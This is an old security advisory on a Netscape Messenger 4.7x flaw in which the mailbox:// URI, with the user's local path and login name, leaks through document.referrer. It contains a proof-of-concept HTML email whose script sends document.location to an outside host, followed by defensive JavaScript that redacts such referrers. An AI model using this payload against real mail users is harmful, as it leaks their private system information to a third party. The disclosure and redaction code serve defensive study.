COMMAND
Netscape Messenger
SYSTEMS AFFECTED
Netscape 4.7x All Platforms
PROBLEM
'3APA3A' found following. There are known bugs in Netscape whose
exploitation requires knowing the location of the user's files. This
bug is not a serious one on its own, but it allows that location to
be obtained.
Netscape Messenger uses an internal protocol called mailbox://. The
format of a mailbox URI is
mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber
This URI contains the full path to the user's mailbox, which usually
contains the user's login name and, in the case of Windows 9x, the
path to the Netscape installation. It's impossible to determine this
location from JavaScript inside an e-mail message, because Netscape
hides document.location from JavaScript.
It is possible, however, to retrieve the mailbox:// URI of the
message, and with it the mailbox location, the user's system login
and in some cases the path to the Netscape installation.
When a link is invoked from a message, Netscape sets the
"document.referrer" property of the target page to the URI of the
message containing this link. JavaScript on the target page is able
to read this property and pass it to any location, together with the
IP of the calling machine.
If you read this message with Netscape Messenger you can simply
click the reference
http://www.security.nnov.ru/files/nsdemo.asp
to see your mailbox location, or you can force a Netscape user to
open this page with a message like this:
From: 3APA3A
To: 3APA3A
Subject: Test your Netscape
Content-Type: text/html
<html><script>
window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
</script>
<A HREF="http://www.security.nnov.ru/files/nsdemo.asp"> http://www.security.nnov.ru/files/nsdemo.asp</A>
</html>
This vulnerability only affects the user's local (on the client
machine) mailbox. If a user keeps his mail on an IMAP server, the
referrer will show up as an imap:// URL instead.
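The following is an added example, not part of the original advisory: a small parser for the mailbox:// URI format described above, plus a sanitizer a web server could apply to the Referer header before it reaches access logs or third-party scripts, so that the local path (login name, install directory) is dropped while the message ID is kept. The sample referrers and the Windows path layout in them are constructed for illustration, not verified Netscape paths.

```javascript
// Schemes Netscape uses internally for mail messages; only mailbox://
// carries a local filesystem path, imap:// carries a server/folder name.
const MAIL_SCHEMES = new Set(['mailbox', 'imap']);

// Parse a referrer string. Returns null when it is not a mail-client URI,
// otherwise {scheme, path, query, leaksLocalPath}.
function parseMailReferrer(ref) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^?#]*)(?:\?([^#]*))?/i.exec(ref || '');
  if (!m) return null;
  const scheme = m[1].toLowerCase();
  if (!MAIL_SCHEMES.has(scheme)) return null;
  const path = decodeURIComponent(m[2]);
  const query = {};
  for (const kv of (m[3] || '').split('&')) {
    if (!kv) continue;
    const i = kv.indexOf('=');
    const k = i < 0 ? kv : kv.slice(0, i);
    const v = i < 0 ? '' : kv.slice(i + 1);
    query[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  return { scheme, path, query, leaksLocalPath: scheme === 'mailbox' };
}

// Redact a referrer for logging: keep the scheme and message ID, which are
// harmless and useful for debugging, and drop the path, which is where the
// login name and Netscape install directory live.
function sanitizeReferrer(ref) {
  const parsed = parseMailReferrer(ref);
  if (!parsed || !parsed.leaksLocalPath) return ref;
  const id = parsed.query.ID ? '?ID=' + encodeURIComponent(parsed.query.ID) : '';
  return parsed.scheme + '://[redacted-local-path]' + id;
}

// Constructed sample referrers (hypothetical paths, not real user data).
const SAMPLE_REFERRERS = [
  'mailbox://C|/Program%20Files/Netscape/Users/jdoe/mail/Inbox?ID=abc123&number=42',
  'imap://mail.example.com/INBOX?ID=abc123',
  'http://www.example.com/page.html',
];

for (const ref of SAMPLE_REFERRERS) {
  console.log(ref, '->', sanitizeReferrer(ref));
}
```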
SOLUTION
Netscape was contacted on May 30, 2001. No feedback was given.
Workaround: Don't use POP3, and keep your mail on an IMAP server.